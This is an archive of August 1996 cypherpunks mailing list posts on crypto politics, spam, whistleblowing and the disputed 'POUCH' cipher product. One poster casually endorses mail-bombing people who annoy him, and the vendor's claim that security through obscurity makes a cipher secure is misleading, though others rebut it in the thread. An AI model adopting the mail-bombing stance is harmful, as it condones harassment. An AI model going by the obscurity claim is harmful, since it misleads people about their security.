prompts me to say that we'll have more freedom online not by relying on
the legislative process, but by deploying pro-freedom technology like
anonymous remailers and PGP. We can't rely on an ossified Beltway
Bureaucracy to preserve our freedoms. (In fact, we need to shrink the size
of the Federal bureaucracy drastically to make it less susceptible to
special-interest lobbying and to reduce its ability to encroach upon our
civil liberties.)

We've argued about this before, of course. I recognize that we have core
philosophical disagreements. You want to work the legislative process and
compromise, while I believe that some rights can't be negotiated away. I
recall you supported White's "Harmful to Minors" CDA compromise that would
have created a new and unprecedented category of speech crimes online.
(The ACLU's Barry Steinhardt wrote on this list last fall that "no true
civil liberties organization" would support such language.) You joined
Leahy in supporting the Bennett bill, which would have permitted Equifax
to create a national medical database with few privacy safeguards. Not to
mention your defense of Leahy's pet Digital Telephony project...

You write: "But none of them [members of Congress] are gong to continue
reaching out a hand to us if we bark and bite when we don't get 100% of
our way." I'm confused by this. Does it mean we shouldn't slam Leahy when
he fucks with the Net? More disturbingly, the incorrect and misleading
label of "impeccable cyberspace credentials" makes it more difficult to
criticize Leahy when he does something (like DT funding or copyright) that
harms netizens. 

I suppose you'd like to champion Leahy as a "Friend of the Net." But I'd
rather not ignore his attempts to pass legislation that would hinder the
development of the Net and intrude on our privacy.

I reiterate my earlier statement: "Leahy is in no way a true friend of the
Net; I don't know of any Beltway politican who is." 

-Declan



On Mon, 26 Aug 1996, Jonah Seiger wrote:

> Declan:
> 
> What are you thinking?!
> 
> In a world where we have very few real friends, I simply don't understand
> what you are trying to accomplish. It's fine (and healthy) to raise
> concerns about the particular positions a member of Congress takes (hell, I
> don't agree with everything Leahy does), but to simply dismiss Leahy as a
> 'no friend of the Net'  is naive and counterproductive.
> 
> Look at the record. Leahy is hands down the strongest supporter of the Net
> in Congress. Period. No other Member (including our small but growing
> handful of other friends like Burns, White, Wyden, Cox, Eshoo, etc) has
> been a more forceful or consistent advocate for your causes for as long as
> Leahy has. What exactly do you want? Perhaps we should elect you to
> Congress and see how well you can do.
> 
> Of course we are not going to agree with our friends on every issue. If
> Leahy takes a position you don't like, I'd suggest you talk to his office.
> I have found in my experience that Leahy's staff (and him personally) will
> take the time to listen when presented with a well presented argument.
> 
> I'm also confused about another thing: which hat were you wearing when you
> wrote this? If it is your "advocate" hat I think it must covering your
> eyes. If it's your "journalist" hat, you need to do a bit better job of
> checking your facts in the future.
> 
> Go a head and reject the "Beltway politicians". It's fashionable, sure, but
> what does it really accomplish?  Some of them are dangerous. Others are
> sympathetic. The fact is that short of armed rebellion they are going to be
> here for a while.
> I shudder to think of the wrath our opponents could wage if we all threw up
> our hands packed up our bags and left town.
> 
> Face the facts. Members of Congress have a lot of constituencies to deal
> with, and we are a small and relatively powerless faction. We can do a lot
> to change the outcomes of policy debates (if I didn't believe that I
> wouldn't be doing what I do everyday), but we have to be realistic,
> recognize where we fit in to the process and who are friends are.  One
> thing's for sure - we have A LOT more enemies than we have friends.
> 
> Most members of Congress don't really understand us or our issues.  Many
> are willing to learn, and some have been real champions for our causes.
> But none of them are gong to continue reaching out a hand to us if we bark
> and bite when we don't get 100% of our way. Zealots rarely win (though it
> sure is fun to throw bombs).
> 
> Sorry for the public thrashing, but this kind of attitude REALLY gets under
> my skin.
> 
> Flames welcome (though response is not guaranteed <g>),
> 
> Jonah

// declan@eff.org // I do not represent the EFF // declan@well.com //







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Tue, 27 Aug 1996 13:32:15 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <3.0b11.32.19960826110912.006d4158@central.tansoft.com>
Message-ID: <199608270040.TAA10161@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <3.0b11.32.19960826110912.006d4158@central.tansoft.com>, on 08/26/96 at 11:09 AM,
   "James C. Sewell" <jims@MPGN.COM> said:

>At 03:47 AM 8/24/96 -0500, William H. Geiger III wrote:
>>
>>No I have to dissagree. Who I send mail to or whom I receive mail from is 
>>no-ones business. I for one have no intention of "signing up" or 
>>"regestering" with any mail server. I most certainally want to be the one to 
>>decide what mail I receive or do not receive, not someone elses idea of what 
>>I should receive.

>Upon reflection I can say you are right, UNLESS we can put this "signup"
>thing on the end-user's machine so he can set it in his own privacy and
>no one else can pilfer it.

>The ultimate solution is AI mail clients, but that's too far off to wait for,
>I feel.

Actually I just set-up a Twit/Auto-Reply filter for my email client. If you make it onto my twit filter all messages are bounced with a message to stop sending mail. I don't even know the message was sent to me unless I check my logfile.

If someone really pisses me off some creative mail-bombing tend to get the message accross.


- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------
 
MR/2 Tag->I use OS/2 2.0 and I don't care who knows!
 
MR/2 Tag->"Do your parents *know* you are Ramones?" - Ms. Togar

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMiJNAo9Co1n+aLhhAQFmugP+NjGXIsalppe9FqrkrRdZpBoZpLxUJsbO
35u/UlkjmtfbX8hJGVML21/OZM+rk4GpAdmiBePs5cLcvOipE01378q5XleOSvD9
PmZCuee2rtpkTV6LbAK5yutu7pD5cXqM2gqV07UqTE2NYBPz0DWXrGPxxAGa+r0X
NrHTwOzvJeY=
=j50N
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "JOHN E. HOLT" <76473.1732@CompuServe.COM>
Date: Tue, 27 Aug 1996 13:39:22 +0800
To: <cypherpunks@toad.com>
Subject: The POUCH
Message-ID: <960826234448_76473.1732_BHT119-3@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


The Pouch uses a 64 x 64 block product cipher, a 1024 bit random initialization
vector and the CBC technique.  Most experts agree that such an implementation is highly resistant to all forms of cryptographic attack.
Hellman and Dilfie rely on knowing the algorithm for their known plain text attacks
An unpublished algorithm forces them into reverse engineering the computer
programs to learn the algorithm. The POUCH has many roadblocks built in
to prevent this.
I refer to Cummings, Cryptography and Data Security pages 150 and 98 in this regard.
John Holt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 27 Aug 1996 14:43:43 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
Message-ID: <199608270304.UAA07482@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:50 AM 8/26/96 -0700, Declan McCullagh wrote:
>---------- Forwarded message ----------
>Date: Mon, 26 Aug 1996 12:23:57 -0400
>From: Jonah Seiger <jseiger@cdt.org>
>To: Declan McCullagh <declan@eff.org>
>Cc: shabbir@vtw.org, fight-censorship@vorlon.mit.edu, brock@well.com,
>    telstar@wired.com
>Subject: Re: INFO: Democratic convention chats online! Be there! (8/25/96)
>Declan:
>In a world where we have very few real friends, I simply don't understand
>what you are trying to accomplish. It's fine (and healthy) to raise
>concerns about the particular positions a member of Congress takes (hell, I
>don't agree with everything Leahy does), but to simply dismiss Leahy as a
>'no friend of the Net'  is naive and counterproductive.
>
>Look at the record. Leahy is hands down the strongest supporter of the Net
>in Congress. Period. No other Member (including our small but growing
>handful of other friends like Burns, White, Wyden, Cox, Eshoo, etc) has
>been a more forceful or consistent advocate for your causes for as long as
>Leahy has. What exactly do you want? Perhaps we should elect you to
>Congress and see how well you can do.

Leahy's crypto bill sucked, bigtime.  The portion of the bill criminalizing 
the use of encryption that had the effect of thwarting a government 
investigation is classic, "foot in the door" creeping government 
manipulation.  I was particularly disgusted to notice that a number of the 
traditional net-freedom organizations rushed to announce that they were in 
favor of that bill, without even a few days of analysis, and did not retract 
or even restrict that support when a more careful study (specifically, that 
of Peter Junger) showed how seriously flawed it was.  Indeed, I never saw 
another analysis that purported to defend Leahy's bill, despite the fact 
that it would have been the responsibility of any organization which claimed 
support of it to prepare one.

I believe that it is particularly suspicious that these bills come into 
existance without even cursory "vetting" on the Internet.  Both the Leahy 
bill and even the Burns crypto bill popped into public view without any 
indication of how they were written, or any public input on their intent and 
scope.  Perhaps this "take it or leave it" practice is old hat to 
politicians, but frankly I'm disgusted at politicians' presumption that they 
can prepare a law with no identifiable input from the public.

I am similarly disgusted at any organization (even if, ostensibly, acting in 
support of "net freedom") that assisted in the development of the Leahy 
crypto bill (and to some extent, even the Burns bill) because they clearly 
failed to solicit the kind of public input that such bills should 
automatically get.

And in a sense, "the Net" doesn't NEED "strong supporters": what we need are 
politicians who are willing to LEAVE US ALONE!  It should come as no 
surprise that the call you frequently see among net-freedom- supporters for 
new legislation is that which repeals existing restrictive laws, such as 
ITAR and censorship laws.  

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 27 Aug 1996 14:10:54 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "----- Message body suppressed -----"
In-Reply-To: <ae43a99302021004167e@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960826202621.11454G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Y'all Christians have a doozey of a verse in the Book of (forget which) 
where they talk abnout the local Israelite babes lusting after the 
foreign pagan lads because they have horse-sized equipments.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Tue, 27 Aug 1996 14:28:53 +0800
To: perry@piermont.com
Subject: Re: libelous action
Message-ID: <199608270323.UAA13852@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sirs:

If I was John E. Holt, I would take a different public relations 
tack.  I would seek positive input, not a negative reaction to 
criticism.  Or I would ignore the critique altogether.

Ross Wright


On Or About: 26 Aug 96, 22:29, Perry E. Metzger wrote:

> demonstrate that. If Mr. Holt would like to sue me, he's invited to.
> I'm sure he'll be at least as likely to follow up as Karl Denninger
> or "Dr." Fred C. Cohen.
> 
> Perry
> 
> C Matthew Curtin writes:
> > JOHN> Dear Mr. Curtin 
> > JOHN> Your statements about myself and my product, The
> > JOHN> POUCH are defamatory.  Since they have been made in writing
> > and JOHN> shown to and seen by other parties on the Internet, they
> > JOHN> constitute libel. Please admit to all parties that you have
> > no JOHN> personal knowledge of my product capabilities or my
> > personal JOHN> character or reputation.  Failure to do so at once
> > will result JOHN> in legal action against you personally and
> > Megasoft.
> [...]
> > I, speaking only on behalf of myself, stand by this statement. I
> > do not apologize for my comments. If you, Mr. Holt, feel that this
> > is a personal attack against you, I regret that you've
> > misunderstood the tone and nature of my post. My statement is
> > hardly libelous; I simply observed that if your product is truly
> > secure, there is no means by which security experts can verify
> > such claims.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 27 Aug 1996 13:54:54 +0800
To: cypherpunks@toad.com
Subject: Re:  ADMIN:  Problems with the list goto the owner, not the list!
In-Reply-To: <199608262123.OAA26029@ecotone.toad.com>
Message-ID: <seNaTD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Hugh Daniel <hugh@ecotone.toad.com> writes:
> wrong with the list~ to owner-cypherpunks@toad.com and NOT the list
> its self.  We already have enough off topic and puerile traffic
> cluttering up the list.

Too much of a good thing is never enough.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@ee.net>
Date: Tue, 27 Aug 1996 14:25:16 +0800
To: "JOHN E. HOLT" <76473.1732@CompuServe.COM>
Subject: Re: libelous action
In-Reply-To: <960826212342_76473.1732_BHT114-1@CompuServe.COM>
Message-ID: <199608270042.UAA04986@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "JOHN" == JOHN E HOLT <76473.1732@CompuServe.COM> writes:

JOHN> Dear Mr. Curtin 
JOHN> Your statements about myself and my product, The
JOHN> POUCH are defamatory.  Since they have been made in writing and
JOHN> shown to and seen by other parties on the Internet, they
JOHN> constitute libel. Please admit to all parties that you have no
JOHN> personal knowledge of my product capabilities or my personal
JOHN> character or reputation.  Failure to do so at once will result
JOHN> in legal action against you personally and Megasoft.

As my signature said, I speak only for myself. I am not a
representative of Megasoft in any official capacity. That which I have
posted does not represent the views of Megasoft, its employees, its
shareholders, its customers, its business partners, its landlord, its
employees' mothers, and is in no way representative of any person
living or dead, other than myself.

I have no knowledge of JOHN E HOLT <76473.1732@CompuServe.COM>. The
only knowledge I have of THE POUCH is its web site, found at 
http://www.flagler.com/security.html

On 18 August 1996, I posted to the Cypherpunks mailing list, a note
regarding THE POUCH, which included this paragraph:

    If it is any good, there's no way for us to know. But your
    marketing of the product has every indication that it's nothing
    more than smoke and mirrors. To coin a phrase, "pseudocrypto."

I, speaking only on behalf of myself, stand by this statement. I do
not apologize for my comments. If you, Mr. Holt, feel that this is a
personal attack against you, I regret that you've misunderstood the
tone and nature of my post. My statement is hardly libelous; I simply
observed that if your product is truly secure, there is no means by
which security experts can verify such claims.

Study of computer security has shown that obscurity (using unpublished
algorithms, for example) is not "security." By perpetuating confusion
between the two terms, nonexpert users of crypographic software are
hard pressed to make good decisions about what they use, and the risks
of the software they're using. Hiding the internals of such software,
claiming that it is "highly resistant to all known forms of
cryptographic attack," is, in my opinion, irresponsible marketing. It
is my hope that future marketing endeavors of THE POUCH will be more
open and straightforward in its approach to security, providing
evidence of a crystal-box architecture, whose security can be more
objectively determined by potential customers.

Hiding a paper from me by putting it somewhere in New York City is
obscurity. If you hide a paper from me by putting it in a safe, and then
give me the safe, and the technical documentation of the safe's
locking mechanism, and I still can't get the paper, then *that* is
security.

(And, by the way, I think you'll find insisting that I somehow retract
my statements, rather than prove me wrong by showing the quality of
your product, will likely further add to the suspicion that the
security of THE POUCH cannot be proven.)

- -- 
C Mattew Curtin
cmcurtin@ee.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Have you encrypted your data today?

iQCVAwUBMiJEYRhyYuO2QvP9AQFPmwQAgimf3IhoX4wMPPNk7JY9nlFDJG2K/gO3
Xnd7ygPYAhz4BRaEl6SAaOOWiKjBA1l5EI5GhZdTL0WIWdKQv5MJROElzTVcY7nx
Tq1wysgTRTLjt7XQS2FyIa1S7OSvyhJttAslbJjpl+PqCwT18bhr3Oh9Cp2g1LRq
sNxdtB1BtQQ=
=I28g
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RealAudio Talking E-mail <talkingmail@realaudio.com>
Date: Tue, 27 Aug 1996 14:03:43 +0800
To: cypherpunks@toad.com
Subject: Scan the Web for Live News, Sports, & Music (Talking E-mail)
Message-ID: <199608270352.UAA15251@audio20.prognet.com>
MIME-Version: 1.0
Content-Type: text/plain


          --------------------------------------
         |       Make this e-mail talk!         |
         | Load this URL into your Web browser: |
         |   http://www.realaudio.com/tmh.ram   |
          --------------------------------------

Dear RealAudio Customer,

Since you downloaded our free RealAudio Player a while back,
you have heard some pretty amazing things on the Web.

Now you can hear even more with RealAudio Player Plus,
an enhanced version of the RealAudio Player.

RealAudio Player Plus has a scan feature that lets you
scan the Web for live music, radio, sports, and news.
It also has Preset Buttons, like a car radio, that
take you straight to your favorite RealAudio sites.

Please visit our Web site to find out more:

http://www.realaudio.com/tmhplus/index.html

We hope you enjoy RealAudio Player Plus,

Rob Glaser                      Bruce Jacobsen
Chairman & CEO,                 President & COO,
Progressive Networks            Progressive Networks






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 27 Aug 1996 12:46:43 +0800
To: coderpunks@toad.com (The Coderpunks list)
Subject: Code Review Guidelines (draft)
Message-ID: <199608270158.UAA24640@homeport.org>
MIME-Version: 1.0
Content-Type: text


A few weeks back, I posted a request for source code review
guidelines.  I got about 50 me-toos, but no guidelines.  So I wrote
some I think are decent.  They're still in draft format.  I'd
appreciate feedback & commentary on them.

http://www.homeport.org/~adam/review.html

Adam

PS: Someone did pay me to do this, but doesn't want their name
associated with it, because there are shoulds and musts in it.  I have
their permission to post the anonymized document.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 27 Aug 1996 14:12:39 +0800
To: "JOHN E. HOLT" <76473.1732@compuserve.com>
Subject: Re: The POUCH
In-Reply-To: <960826234448_76473.1732_BHT119-3@CompuServe.COM>
Message-ID: <199608270104.VAA27340@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"JOHN E. HOLT" writes:
> The Pouch uses a 64 x 64 block product cipher, a 1024 bit random
> initialization vector and the CBC technique.  Most experts agree
> that such an implementation is highly resistant to all forms of
> cryptographic attack.

Thats just plain wrong.

Some block ciphers are highly resistant. Some block ciphers crack open
like eggs. Being a "block product cipher" doesn't in any way make you
"highly resistant to all forms of cryptographic attack".

> An unpublished algorithm forces them into reverse engineering the computer
> programs to learn the algorithm.

The principle in the modern world of crypto is that your cipher must
be resistant to attack even if the attacker knows all details of it.

Furthermore, the principle in buying crypto is to know that 99% of
crypto on the market is junk, and that if you can't find out how it
works its probably not any good at all.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Tue, 27 Aug 1996 13:18:22 +0800
To: 76473.1732@compuserve.com (JOHN E. HOLT)
Subject: Re: The POUCH
In-Reply-To: <960826234448_76473.1732_BHT119-3@CompuServe.COM>
Message-ID: <m0uvCrF-0000xRC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


JOHN E. HOLT enscribed thusly:
> 
> The Pouch uses a 64 x 64 block product cipher, a 1024 bit random initialization
> vector and the CBC technique.  Most experts agree that such an implementation is highly resistant to all forms of cryptographic attack.
> Hellman and Dilfie rely on knowing the algorithm for their known plain text attacks
> An unpublished algorithm forces them into reverse engineering the computer
> programs to learn the algorithm. The POUCH has many roadblocks built in
> to prevent this.

	An unpublished algorithm mean that it's worthless snakeoil that
depends on obfuscation until it is successfully reverse engineered (which
you just set yourself up as a prime target) and then all of your chumps
(ahh..  clients) get raped.  I wouldn't even look at it and would advise
all of my clients to avoid it like the plague...

> I refer to Cummings, Cryptography and Data Security pages 150 and 98 in this regard.
> John Holt

-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Senescall <apache@quux.apana.org.au>
Date: Mon, 26 Aug 1996 22:09:54 +0800
To: cypherpunks@toad.com
Subject: Is this list dead?
In-Reply-To: <ae43349d010210042760@[205.199.118.202]>
Message-ID: <Pine.LNX.3.91.960826212603.28441A-100000@quux.apana.org.au>
MIME-Version: 1.0
Content-Type: text/plain



Nothing through here in the last 24 hours.



-- 
   .////.   .//    Charles Senescall            apache@quux.apana.org.au
 o:::::::::///     Fuck TEL$TRA                    
>::::::::::\\\     Finger me for PGP PUBKEY           Brisbane AUSTRALIA
   '\\\\\'   \\    http://quux.apana.org.au/~apache/ 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Tue, 27 Aug 1996 14:12:51 +0800
To: "Igor Chudov" <jad@dsddhc.com>
Subject: Re: Spamming
Message-ID: <19960827042758906.AAA215@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 26 Aug 1996 13:26:04 -0500, John Deters wrote:

>>What do cypherpunks think about the following practice or law (I realize
>>that it may be impossible to implement): each email message should carry
>>a little digicash check for, say, 20 cents. Mail reading programs should
>>reject (send back unread) all messages not carrying these digital
>>checks, unless the senders are in the "friends list". The MUAs should
>>ask users whether they want to "cash" the digital check or not.
>
>I do not believe it is possible to have a secure executable that exists on
>an uncontrolled user's machine.  "Tamperproof" encryption chips still
>require communications in and out from the user's program.  A determined
>attacker could continue to use the pieces of their code that talk to the
>encryption chip.

>Never underestimate the allure of "free money" when you're planning to >give
>it away.

Methinks you don't understand e-cash.  It's not executable, and uses public key
crypto to prevent "minting".  It uses records to prevent replays.  In other
words, it'd be like Ed McMahon including a quarter in the envelope.  You'd only
be able to use it once....

/ If you think education is expensive, try ignorance.
/ Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
/ Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
/ Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
/ Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 27 Aug 1996 13:23:18 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Cypherpunk voting - ITAR or CDA
In-Reply-To: <199608261917.MAA24551@netcom8.netcom.com>
Message-ID: <Pine.SUN.3.91.960826213639.28400B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 26 Aug 1996, Bill Frantz wrote:

> At  1:37 AM 8/25/96 -0400, Vincent Cate wrote:
> >So it seems Dole is the better vote.  Is this important enough to many
> >cypherpunks to actually determine their vote?
> 
> Every time I think about voting for Dole, I read something in the papers
> that convinces me it is a bad idea.  The most recent is that he wants to
> raise the intensity of the disastrous, failed war on drugs.
> 
> You know the war.  The one that has forced suppliers to enforce their
> contracts with violence because the courts won't help them.  The one that
> eliminated the concept of responsible use which has worked so well with
> alcohol.  The one that has eliminated reputation from the drug market,
> leading to overdoses and poisonings.  The one that is responsible for most
> of the wire taps authorized in the USA.  The one that has turned the USA
> into the prison capitol of the world.  Don't get me started.
> 
> 
> -------------------------------------------------------------------------
> Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
> (408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
> frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA
> 
> 
> 

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 27 Aug 1996 12:12:33 +0800
To: cypherpunks@toad.com
Subject: CLE_nup
Message-ID: <199608262221.WAA00909@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-26-96. FiTi: 
 
   "Cleaning up the global economy. Policymakers must ponder 
   the effects of money laundering." 
 
      Is money laundering - as opposed to the crimes which 
      produce it - necessarily such a bad thing? 
 
      As Vito Tanzi notes in his IMF paper, the fact that 
      money launderers are not fussy about economic 
      fundamentals can help governments continue to pursue lax 
      fiscal and monetary policies if they are equally unfussy 
      about the origin of capital inflows. A pact with the 
      devil, perhaps. But for many countries it may seem more 
      attractive than signing up to a global financial market 
      equivalent of Neighbourhood Watch. 
 
      + Money Laundering and the International Financial 
      System, IMF working paper, May 1996. 
 
   ----- 
 
   http://jya.com/clenup.txt  (7 kb) 
 
   CLE_nup 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 27 Aug 1996 15:44:28 +0800
To: cmcurtin@ee.net
Subject: Re: libelous action
In-Reply-To: <199608270042.UAA04986@goffette.research.megasoft.com>
Message-ID: <199608270229.WAA27445@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mr. Curtin;

You are too kind. I suspect that 'The Pouch' is a piece of junk,
although the lack of public disclosure makes it impossible to
demonstrate that. If Mr. Holt would like to sue me, he's invited
to. I'm sure he'll be at least as likely to follow up as Karl
Denninger or "Dr." Fred C. Cohen.

Perry

C Matthew Curtin writes:
> JOHN> Dear Mr. Curtin 
> JOHN> Your statements about myself and my product, The
> JOHN> POUCH are defamatory.  Since they have been made in writing and
> JOHN> shown to and seen by other parties on the Internet, they
> JOHN> constitute libel. Please admit to all parties that you have no
> JOHN> personal knowledge of my product capabilities or my personal
> JOHN> character or reputation.  Failure to do so at once will result
> JOHN> in legal action against you personally and Megasoft.
[...]
> I, speaking only on behalf of myself, stand by this statement. I do
> not apologize for my comments. If you, Mr. Holt, feel that this is a
> personal attack against you, I regret that you've misunderstood the
> tone and nature of my post. My statement is hardly libelous; I simply
> observed that if your product is truly secure, there is no means by
> which security experts can verify such claims.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 27 Aug 1996 14:23:14 +0800
To: geoff@digidem.com (Geoffrey Gussis)
Subject: Re: Whistleblowing on the Internet
In-Reply-To: <v03007802ae47e8a83d6d@[128.252.112.220]>
Message-ID: <199608270353.WAA25380@homeport.org>
MIME-Version: 1.0
Content-Type: text


Geoffrey Gussis wrote:

| Overall, I am quite surprised that there isn't a whistleblowing
| clearinghouse on the Internet; a site sponsored by a non-profit that lists
| email addresses and secure forms for sending anonymized email to those
| areas of the public and private sector that deal with whistleblowing.  As
| the Internet is a great medium for information dissemination, and offers
| significant privacy advantages, I really expected to find much more.

	Such a clearinghouse is what we call a fat target; something
likely to attract attention since wiretapping it could be very useful
to an organization that worried about having a whistleblower.

	As such, the correct attitude towords whistleblowing is to use
an anonymous remailer, and send to interested parties.  That's how the
AT&T deal that sunk the des phones and made clipper a household word
was publicized; a member of the list(?) interested party sent a
number of interesting documents through remailers to cypherpunks.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 27 Aug 1996 16:54:56 +0800
To: cypherpunks@toad.com
Subject: Re: Hackers invade DOJ web site
Message-ID: <199608270627.XAA02547@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:35 PM 8/20/96 -0700, some anonym remailer user wrote:
>All webservers (except maybe Spinner?) are riddled with buffer overrun
>bugs and other similar security holes.  If you run a webserver, you
>should basically assume that anyone who really wants a shell on your
>machine can get one.  Grab your favorite webserver and grep for
>sprintf.

Fred Cohen put out an 80-line-C GET-only HTTP server which is
short enough to verify that it doesn't have security bugs
like memory leaks, etc.  It's not blazingly fast,
and all it does is server pages, but it's clean.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 27 Aug 1996 16:55:50 +0800
To: mccoy@communities.com (Jim McCoy)
Subject: Re:Edited Edupage, 18 Aug 1996 [SATELLITES]
Message-ID: <199608270627.XAA02553@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:35 AM 8/21/96 -0800, mccoy@communities.com (Jim McCoy) wrote:
>You want to avoid moving parts like the plague in orbit.  They eventually
>wear out or fail and once that happens you have a very expensive piece of
>junk in orbit.  Solid-state storage is the _only_ way to go if you want to
>avoid things like neding to pressurize the drive (eliminating any cost
>advantage over solid-state.) 

Why do you need to pressurize the drive?  Most hard disk drives
for the last N years have been airtight sealed containers,
haven't they?  (Removables are different, of course.)

I'd worry far more about the stresses of launch bothering
the drives.

> Its not like you can go up to swap a dead drive
> out you know...

You do obviously want RAID and/or mirrored drives.

> Solid-state

Most government space computer equipment has expensive RAD-hardended RAM;
it's much cheaper and probably more effective to just use conventional
RAM with ECC and shield it a bit.  At least at one time, the most powerful
computer on the Space Shuttle was the Compaq 386/25 laptop that one
of the astronauts brought along for some non-mission-critical work;
most of the built-in computers were 1 MIPS or less.

>The big problem is that no one has data that is worth protecting enough to
>make such a venture pay off.

Yup.  Ego would be a good motivation, if you know somebody with enough
spare cash :-)

While it would be nice to have satellites around all the time,
even one or two smallsats could provide services on a several-times-daily
basis which would be enough to do private email.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Choi <choi@virtu.sar.usf.edu>
Date: Tue, 27 Aug 1996 19:17:11 +0800
To: lacc@suburbia.net
Subject: LACC: Metacomputing : got it from EurekAlert
Message-ID: <Pine.SUN.3.93.960826233902.25039B-100000@virtu>
MIME-Version: 1.0
Content-Type: text/plain


Metacomputing: Sharing Hardware Could Put Cash in Your Pocket

While you're asleep, your home computer signs onto the Internet and looks
for work. By morning, it's done complex calculations for a scientist in
London, designed an ad for an Arizona business--and fattened up your bank
account. 

This scenario--called metacomputing--could become a reality in the very
near future, says Baruch Awerbuch, a professor of computer science at The
Johns Hopkins University.  He is studying the economics of sharing
computer power over the Internet, including pricing and marketing issues.
